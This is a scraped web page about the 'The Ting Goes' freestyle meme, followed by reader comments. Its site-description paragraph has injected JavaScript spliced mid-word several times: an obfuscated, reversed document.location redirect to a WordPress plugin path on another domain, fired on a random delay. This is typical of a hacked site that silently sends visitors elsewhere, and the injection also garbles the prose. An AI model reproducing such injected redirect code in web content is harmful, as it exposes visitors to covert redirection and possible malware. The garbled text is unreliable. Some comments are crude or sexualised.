‘The Ting Goes’ Is Already the Best Meme of September

U.K. Comedian Michael Dapaah visited BBC Radio 1Xtra’s “Fire in the Booth” show and delivered a freestyle that already is making a case on Twitter for being the best meme of the month.

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COMPLEX is a community of creatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors and curatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors, armed with the Internet, committed toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to surfacing and sharing the voices and conversations that define our new America. Our videos exemplify convergence culture, exploring toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topics that include music, sneakers, style, sports and pop culture through original shows and Complex News segments. Featuring your favorite celebrities, authoritative commentary, and a unique voice, our videos make culture pop.

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39 thoughts on “‘The Ting Goes’ Is Already the Best Meme of September”

  1. Ainsley Digestive biscuit says:

    Getting on fire in the booth in England is like being a xxl freshman in America basically

  2. rylan2v219 says:

    The ting is at 1: 12

  3. KspreeTheUnicorn says:

    the best for people who only really care about hip hop

  4. Encik Cendawan says:


  5. LogitecBoss says:

    Babes its BIG Shaq yeah not roadman shaq

  6. Mötex Archives says:

    So are we gonna ignore the fact that this girl is hella cute?!

  7. TheWashWizard !!! says:

    The new behind the meme hide your memes kids

  8. Josh Appiah says:

    the ting goes skraaaaaa alahakbaaaaaaaaar

  9. Josh Appiah says:

    the ting oges England is my city

  10. david aranda says:

    Raw Sauce

  11. david aranda says:

    Rice gum visualizes2

  12. Gray says:

    Why is complex a thing

  13. Kennard Teutomar says:

    'complex news' – 'this is the new trending meme kthxbai'

  14. rooty tooty point and shooty exquisite says:

    K W I K M A F F Z

  15. star boys says:

    It's so funny

  16. M Thd says:


  17. Doliague says:

    The comment section is the war of 1812 but in 2017.

  18. Tyler Moxey says:


  19. RonPaulTheGreatestPresidentTheUSNeverHad says:

    ey b0ss, can i habe da pusi

  20. Veen Nogare says:


  21. Kingg Mikee says:

    Take off your jacket

    Babes… your mans not HOT

  22. t508 says:

    The way americans explain grime is actually really cringey !

  23. big shacc says:


  24. Andy C says:

    "What does the car say?"

  25. Ano nymous says:

    not my proudest fap.

  26. vladmir tod says:

    2017 national anthem

  27. Nicholas Lee says:

    Man's not hot, Natasha is tho… she fine lookin

  28. Moizr Muhammed says:

    I’m in love with ur beauty girl u are beautiful

  29. Mr.banana 2000 says:

    best meme of the year*

  30. Joshua M. says:

    smoke trees

  31. Acid Productions says:

    Fuck the movie. I'm more interested in Natasha.

  32. BlueSkeli says:


  33. Meme says:

    They deadass had a Dolan dark video

  34. Hazza says:

    "What do you want with your fries?"



    "No ketchup!"


    "Just Sauce. Raw sauce!"

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